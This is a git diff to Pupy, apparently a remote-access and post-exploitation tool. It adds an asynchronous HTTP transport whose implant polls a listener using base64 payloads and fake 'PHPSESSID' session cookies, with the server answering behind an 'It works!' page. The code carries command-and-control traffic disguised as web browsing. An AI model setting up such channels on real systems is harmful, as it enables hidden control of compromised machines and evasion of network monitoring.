diff --git a/pupy/network/base.py b/pupy/network/base.py index 6b418847..dd98523d 100644 --- a/pupy/network/base.py +++ b/pupy/network/base.py @@ -19,6 +19,7 @@ class BasePupyTransport(object): self.upstream=stream.upstream self.stream=stream self.circuit=Circuit(self.stream, self) + self.cookie=None def on_connect(self): """ diff --git a/pupy/network/buffer.py b/pupy/network/buffer.py index 204d67ef..4e0e75ef 100644 --- a/pupy/network/buffer.py +++ b/pupy/network/buffer.py @@ -16,6 +16,7 @@ class Buffer(object): self.waiting_lock=threading.Lock() self.waiting=threading.Event() self.transport=transport_func + self.cookie=None def on_write(self): diff --git a/pupy/network/clients.py b/pupy/network/clients.py index 96c90bfd..9919eda4 100644 --- a/pupy/network/clients.py +++ b/pupy/network/clients.py @@ -9,6 +9,13 @@ class PupyClient(object): """ return a socket after connection """ raise NotImplementedError("connect not implemented") +class PupyAsyncClient(object): + def connect(self, host, port, timeout=10): + self.host=host + self.port=port + self.timeout=timeout + return self.host, self.port, self.timeout + class PupyTCPClient(PupyClient): def __init__(self, family = socket.AF_UNSPEC, socktype = socket.SOCK_STREAM, timeout = 3, nodelay = False, keepalive = False): super(PupyTCPClient, self).__init__() diff --git a/pupy/network/conf.py b/pupy/network/conf.py index 4d8f1c32..78662b82 100644 --- a/pupy/network/conf.py +++ b/pupy/network/conf.py @@ -4,8 +4,8 @@ import os import logging -from .servers import PupyTCPServer -from .clients import PupyTCPClient, PupySSLClient, PupyProxifiedTCPClient, PupyProxifiedSSLClient +from .servers import PupyTCPServer, PupyAsyncTCPServer +from .clients import PupyTCPClient, PupySSLClient, PupyProxifiedTCPClient, PupyProxifiedSSLClient, PupyAsyncClient from .transports import dummy, b64, http try: from .transports.obfs3 import obfs3 @@ -20,7 +20,7 @@ except ImportError as e: #to make pupy works even without scramblesuit dependencies logging.warning("%s. The scramblesuit transport has been disabled."%e) scramblesuit=None -from .streams import PupySocketStream +from .streams import * from .launchers.simple import SimpleLauncher from .launchers.auto_proxy import AutoProxyLauncher from .launchers.bind import BindLauncher @@ -104,8 +104,8 @@ transports["tcp_base64"]={ "server_transport_kwargs": {}, } -transports["http_cleartext"]={ - "info" : "TCP transport using HTTP with base64 encoded payloads", +transports["sync_http_cleartext"]={ #TODO fill with empty requests/response between each request/response to have only a following of req/res and not unusual things like req/req/req/res/res/req ... + "info" : "TCP transport using HTTP with base64 encoded payloads (synchrone with Keep-Alive headers and one 3-way-handshake)", "server" : PupyTCPServer, "client": PupyTCPClient, "client_kwargs" : {}, @@ -117,6 +117,19 @@ transports["http_cleartext"]={ "server_transport_kwargs": {}, } +transports["async_http_cleartext"]={ + "info" : "TCP transport using HTTP with base64 encoded payloads (asynchrone with client pulling the server and multiple 3-way handshakes (slow))", + "server" : PupyAsyncTCPServer, + "client": PupyAsyncClient, + "client_kwargs" : {}, + "authenticator" : None, + "stream": PupyAsyncTCPStream , + "client_transport" : http.PupyHTTPClient, + "server_transport" : http.PupyHTTPServer, + "client_transport_kwargs": {}, + "server_transport_kwargs": {}, + } + if obfs3: transports["obfs3"]={ "info" : "TCP transport using obfsproxy's obfs3 transport", diff --git a/pupy/network/servers.py b/pupy/network/servers.py index 45ccf8ed..94337e02 100644 --- a/pupy/network/servers.py +++ b/pupy/network/servers.py @@ -4,6 +4,198 @@ from rpyc.utils.server import ThreadPoolServer from rpyc.core import Channel, Connection from rpyc.utils.authenticators import AuthenticationError +from rpyc.core.stream import Stream +from buffer import Buffer +import threading, socket +from streams.PupySocketStream import addGetPeer +import logging + + +class PseudoStreamDecoder(Stream): + def __init__(self, transport_class, transport_kwargs): + self.bufin=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.bufout=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.upstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.downstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.transport=transport_class(self, **transport_kwargs) + self.lockin=threading.Lock() + self.lockout=threading.Lock() + + def decode_data(self, data): + with self.lockin: + #print "decoding %s"%repr(data) + self.bufin.drain() + self.bufin.write(data) + self.transport.downstream_recv(self.bufin) + cookie=self.bufin.cookie + self.bufin.cookie=None + return self.upstream.read(), cookie + + def encode_data(self, data, cookie): + with self.lockout: + #print "encoding %s"%repr(data) + self.bufout.drain() + self.bufout.write(data) + self.bufout.cookie=cookie + self.transport.upstream_recv(self.bufout) + return self.downstream.read() + +class PupyAsyncServer(object): + def __init__(self, service, **kwargs): + if not "stream" in kwargs: + raise ValueError("missing stream_class argument") + if not "transport" in kwargs: + raise ValueError("missing transport argument") + self.stream_class=kwargs["stream"] + self.transport_class=kwargs["transport"] + self.transport_kwargs=kwargs["transport_kwargs"] + del kwargs["stream"] + del kwargs["transport"] + del kwargs["transport_kwargs"] + + self.authenticator=kwargs.get("authenticator", None) + self.protocol_config=kwargs.get("protocol_config", {}) + self.service=service + + self.active=False + self.clients={} + self.void_stream=PseudoStreamDecoder(self.transport_class, self.transport_kwargs) + + def dispatch_data(self, data_received, host=None, port=None): + """ receive data, forward it to the stream and send back the stream downstream if any """ + decoded, cookie=self.void_stream.decode_data(data_received) + if cookie is None: + logging.debug("failed to retreived cookie, rejecting data %s"%repr(data_received)) + return self.void_stream.encode_data("", None) + if cookie not in self.clients: + logging.info("new client connected : %s:%s cookie=%s"%(host, port, cookie)) + config = dict(self.protocol_config, credentials=None, connid="%s:%d"%(host, port)) + if self.authenticator: + try: + sock, credentials = self.authenticator(data_received) + config["credentials"]=credentials + except AuthenticationError: + logging.info("failed to authenticate, rejecting data") + raise + self.clients[cookie]=self.stream_class((host, port), self.transport_class, self.transport_kwargs) + self.clients[cookie].buf_in.cookie=cookie + self.clients[cookie].buf_out.cookie=cookie + conn=Connection(self.service, Channel(self.clients[cookie]), config=config, _lazy=True) + t = threading.Thread(target = self.handle_new_conn, args=(conn,)) + t.daemon=True + t.start() + resp=None + with self.clients[cookie].upstream_lock: + self.clients[cookie].upstream.write(decoded) + #return self.void_stream.encode_data(self.clients[cookie].downstream.read(), cookie) + resp=self.clients[cookie].downstream.read() + if not resp: # No data to send, so we send the default page with no data + resp=self.void_stream.encode_data("", cookie) + + return resp + + def handle_new_conn(self, conn): + try: + conn._init_service() + conn.serve_all() + #while True: + # conn.serve(0.01) + except Exception as e: + logging.error(e) + + def accept(self): + """ Should call dispatch_data on data retrieved. Data must contain a \"cookie\" to define to which connection the packet of data belongs to """ + raise NotImplementedError() + + def close(self): + raise NotImplementedError() + + def start(self): + """ blocking while the server is active """ + raise NotImplementedError() + +class PupyAsyncTCPServer(PupyAsyncServer): + def __init__(self, *args, **kwargs): + super(PupyAsyncTCPServer, self).__init__(*args, **kwargs) + self.sock=None + self.hostname=kwargs['hostname'] + self.port=kwargs['port'] + + def listen(self): + s=None + if not self.hostname: + self.hostname=None + last_exc=None + for res in socket.getaddrinfo(self.hostname, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, 0, socket.AI_PASSIVE): + af, socktype, proto, canonname, sa = res + try: + s = socket.socket(af, socktype, proto) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + except socket.error as msg: + s = None + last_exc=msg + continue + try: + s.bind(sa) + s.listen(100) + except socket.error as msg: + s.close() + s = None + last_exc=msg + continue + break + self.sock=s + if self.sock is None: + raise last_exc + + def accept(self): + try: + s, addr = self.sock.accept() + t=threading.Thread(target=self.serve_request, args=(s, addr,)) + t.daemon=True + t.start() + #TODO : make a pool of threads + except Exception as e: + logging.error(e) + + def serve_request(self, s, addr): + full_req=b"" + s.settimeout(0.1) + while True: + try: + d=s.recv(4096) + if not d: + break + full_req+=d + except socket.timeout: + break + try: + if full_req: + response=self.dispatch_data(full_req, host=addr[0], port=addr[1]) + #print "sending response: %s"%repr(response) + s.sendall(response) + finally: + s.close() + + def start(self): + self.listen() + self.active=True + try: + while self.active: + self.accept() + except EOFError: + pass # server closed by another thread + except KeyboardInterrupt: + print("") + print "keyboard interrupt!" + finally: + logging.info("server has terminated") + self.close() + + def close(self): + #TODO + pass + class PupyTCPServer(ThreadPoolServer): def __init__(self, *args, **kwargs): diff --git a/pupy/network/streams/PupyAsyncStream.py b/pupy/network/streams/PupyAsyncStream.py new file mode 100644 index 00000000..13b1ce1a --- /dev/null +++ b/pupy/network/streams/PupyAsyncStream.py @@ -0,0 +1,208 @@ +# -*- coding: UTF8 -*- +# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) +# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms +""" abstraction layer over rpyc streams to handle different transports and integrate obfsproxy pluggable transports """ + +__all__=["PupyAsyncTCPStream"] + +from rpyc.core.stream import Stream +from ..buffer import Buffer +import sys, socket, time, errno, logging, traceback, string, random, threading +from rpyc.lib.compat import select, select_error, BYTES_LITERAL, get_exc_errno, maxint +from PupySocketStream import addGetPeer + +class addGetPeer(object): + """ add some functions needed by some obfsproxy transports""" + def __init__(self, peer): + self.peer=peer + def getPeer(self): + return self.peer + +def monitor(st): + while True: + print "upstream: %s %s"%(len(st.upstream),repr(st.upstream.peek())) + print "downstream: %s %s"%(len(st.downstream), repr(st.downstream.peek())) + print "buf_in: %s %s"%(len(st.buf_in), st.buf_in.peek()) + print "buf_out: %s %s"%(len(st.buf_out), st.buf_out.peek()) + time.sleep(3) + + +class PupyAsyncStream(Stream): + """ Pupy asynchrone stream implementation """ + def __init__(self, dstconf, transport_class, transport_kwargs={}): + super(PupyAsyncStream, self).__init__() + self.active=True + #buffers for streams + self.buf_in=Buffer() + self.buf_out=Buffer() + self.buf_tmp=Buffer() + self.cookie=''.join(random.SystemRandom().choice("abcdef0123456789") for _ in range(32)) + self.buf_in.cookie=self.cookie + self.buf_out.cookie=self.cookie + self.buf_tmp.cookie=self.cookie + #buffers for transport + self.upstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.downstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443))) + self.upstream_lock=threading.Lock() + self.downstream_lock=threading.Lock() + self.transport=transport_class(self, **transport_kwargs) + + self.max_pull_interval=2 + self.pull_interval=0 + self.pull_event=threading.Event() + self.MAX_IO_CHUNK=32000*100 #3Mo because it is a async transport + + #threading.Thread(target=monitor, args=(self,)).start() + self.client_side=self.transport.client + if self.client_side: + self.poller_thread=threading.Thread(target=self.poller_loop) + self.poller_thread.daemon=True + self.poller_thread.start() + + def close(self): + """closes the stream, releasing any system resources associated with it""" + print "closing stream !" + self.active=False + self.buf_in.cookie=None + self.buf_out.cookie=None + + @property + def closed(self): + """tests whether the stream is closed or not""" + return not self.active + + def fileno(self): + """returns the stream's file descriptor""" + raise NotImplementedError() + + def poll(self, timeout): + """indicates whether the stream has data to read (within *timeout* + seconds)""" + return (len(self.upstream) > 0) or self.closed + + def read(self, count): + try: + #print "reading :%s"%count + while True: + #with self.downstream_lock: #because downstream write in upstream + if not self.active: + raise EOFError("connexion closed") + if len(self.upstream)>=count: + if not self.active: + raise EOFError("connexion closed") + #print "%s read upstream !"%count + return self.upstream.read(count) + self.pull() + time.sleep(0.01) + + #it seems we can actively wait here with only perf enhancement + #if len(self.upstream)0: + with self.upstream_lock: + data_to_send=self.downstream.read() + else: + if empty_message is None : + #no data, let's generate an empty encoded message to pull + self.buf_tmp.drain() + self.transport.upstream_recv(self.buf_tmp) + empty_message=self.downstream.read() + data_to_send=empty_message + + received_data=b"" + try: + received_data=self.pull_data(data_to_send) + except IOError as e: + print "IOError: %s"%e + print "closing connection" + self.close() + + with self.downstream_lock: + if received_data: + self.buf_in.write(received_data) + self.transport.downstream_recv(self.buf_in) + if not self.pull_event.wait(self.pull_interval): #then timeout + self.pull_interval+=0.01 + if self.pull_interval>self.max_pull_interval: + self.pull_interval=self.max_pull_interval + #print "pull interval: %s"%self.pull_interval + self.pull_event.clear() + except Exception as e: + logging.debug(traceback.format_exc()) + time.sleep(self.pull_interval) + + def write(self, data): + if not self.active: + raise EOFError("connexion closed") + with self.upstream_lock: + self.buf_out.write(data) + self.transport.upstream_recv(self.buf_out) + self.pull() + +class PupyAsyncTCPStream(PupyAsyncStream): + def __init__(self, dstconf, transport_class, transport_kwargs={}): + self.hostname=dstconf[0] + self.port=dstconf[1] + super(PupyAsyncTCPStream, self).__init__(dstconf, transport_class, transport_kwargs) + + def pull_data(self, data): + s = None + last_exc=None + for res in socket.getaddrinfo(self.hostname, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM): + af, socktype, proto, canonname, sa = res + try: + s = socket.socket(af, socktype, proto) + except socket.error as msg: + s = None + last_exc=msg + continue + try: + s.connect(sa) + except socket.error as msg: + s.close() + s = None + last_exc=msg + continue + break + if s is None: + raise last_exc + #print "sending %s"%repr(data) + s.sendall(data) + total_received=b"" + #print "receiving ..." + s.settimeout(15) + while True: + try: + data = s.recv(4096) + if not data: + break + total_received+=data + except socket.timeout: + break + + #print "received: %s"%repr(total_received) + s.close() + return total_received + diff --git a/pupy/network/streams.py b/pupy/network/streams/PupySocketStream.py similarity index 91% rename from pupy/network/streams.py rename to pupy/network/streams/PupySocketStream.py index eeb0d600..d1052f04 100644 --- a/pupy/network/streams.py +++ b/pupy/network/streams/PupySocketStream.py @@ -2,9 +2,12 @@ # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) # Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms """ abstraction layer over rpyc streams to handle different transports and integrate obfsproxy pluggable transports """ + +__all__=["PupySocketStream"] + import sys from rpyc.core import SocketStream -from .buffer import Buffer +from ..buffer import Buffer import socket import time import errno @@ -12,7 +15,7 @@ import logging import traceback from rpyc.lib.compat import select, select_error, BYTES_LITERAL, get_exc_errno, maxint import threading -retry_errnos = (errno.EAGAIN, errno.EWOULDBLOCK) + class addGetPeer(object): """ add some functions needed by some obfsproxy transports""" @@ -52,7 +55,7 @@ class PupySocketStream(SocketStream): return except socket.error: ex = sys.exc_info()[1] - if get_exc_errno(ex) in retry_errnos: + if get_exc_errno(ex) in (errno.EAGAIN, errno.EWOULDBLOCK): # windows just has to be a bitch return self.close() @@ -73,16 +76,6 @@ class PupySocketStream(SocketStream): if len(self.downstream)>0: super(PupySocketStream, self).write(self.downstream.read()) - """ - def _downstream_recv_loop(self): - try: - while True: - self._read() - self.transport.downstream_recv(self.buf_in) - except EOFError as e: - self.upstream.set_eof(e) - """ - def read(self, count): try: if len(self.upstream)>=count: diff --git a/pupy/network/streams/__init__.py b/pupy/network/streams/__init__.py new file mode 100644 index 00000000..7cb92bcf --- /dev/null +++ b/pupy/network/streams/__init__.py @@ -0,0 +1,5 @@ +# -*- coding: UTF8 -*- + +from PupySocketStream import * +from PupyAsyncStream import * + diff --git a/pupy/network/transports/http.py b/pupy/network/transports/http.py index 95f288fd..19aaa0be 100644 --- a/pupy/network/transports/http.py +++ b/pupy/network/transports/http.py @@ -31,9 +31,14 @@ def http_req2data(s): decoded_data=base64.b64decode(path[1:]) except: raise MalformedData("can't decode b64") - if not decoded_data: - raise MalformedData("empty data") - return decoded_data + cookie=None + try: + for line in s.split("\r\n"): + if line.startswith("Cookie"): + cookie=(line.split(":",1)[1]).split("=")[1].strip() + except: + pass + return decoded_data, cookie error_response_body="""

It works!

@@ -54,6 +59,7 @@ class PupyHTTPTransport(BasePupyTransport): pass class PupyHTTPClient(PupyHTTPTransport): + client=True #to start polling def __init__(self, *args, **kwargs): PupyHTTPTransport.__init__(self, *args, **kwargs) self.headers=OrderedDict({ @@ -62,12 +68,16 @@ class PupyHTTPClient(PupyHTTPTransport): "Connection" : "keep-alive", }) + def upstream_recv(self, data): """ raw data to HTTP request + need to send a request anyway in case of empty data (for pulling purpose !) """ try: d=data.peek() + if data.cookie is not None: + self.headers['Cookie']="PHPSESSID=%s"%data.cookie encoded_data=data2http_req(d, self.headers) data.drain(len(d)) self.downstream.write(encoded_data) @@ -94,7 +104,7 @@ class PupyHTTPClient(PupyHTTPTransport): if content_length is None: break decoded_data+=base64.b64decode(rest[:content_length]) - length_to_drain=content_length+4+len(headers)+len(fl)+2 + length_to_drain=content_length+4+len(head) data.drain(length_to_drain) d=d[length_to_drain:] except Exception as e: @@ -103,9 +113,9 @@ class PupyHTTPClient(PupyHTTPTransport): if decoded_data: self.upstream.write(decoded_data) - class PupyHTTPServer(PupyHTTPTransport): + client=False def __init__(self, *args, **kwargs): PupyHTTPTransport.__init__(self, *args, **kwargs) @@ -140,7 +150,9 @@ class PupyHTTPServer(PupyHTTPTransport): for req in tab: try: if req: - decoded_data += http_req2data(req) + newdata, cookie = http_req2data(req) + decoded_data+=newdata + data.cookie=cookie data.drain(len(req)+4) except MalformedData: logging.debug("malformed data drained: %s"%repr(req)) diff --git a/pupy/pp.py b/pupy/pp.py index 2410f573..b76ba155 100755 --- a/pupy/pp.py +++ b/pupy/pp.py @@ -203,15 +203,14 @@ def rpyc_loop(launcher): event=threading.Event() t=threading.Thread(target=check_timeout, args=(event, stream.close)) t.daemon=True - t.start() + #t.start() try: conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {}) finally: event.set() - while True: + while not stream.closed: attempt=0 - conn.serve() - time.sleep(0.001) + conn.serve(0.001) except KeyboardInterrupt: raise except EOFError: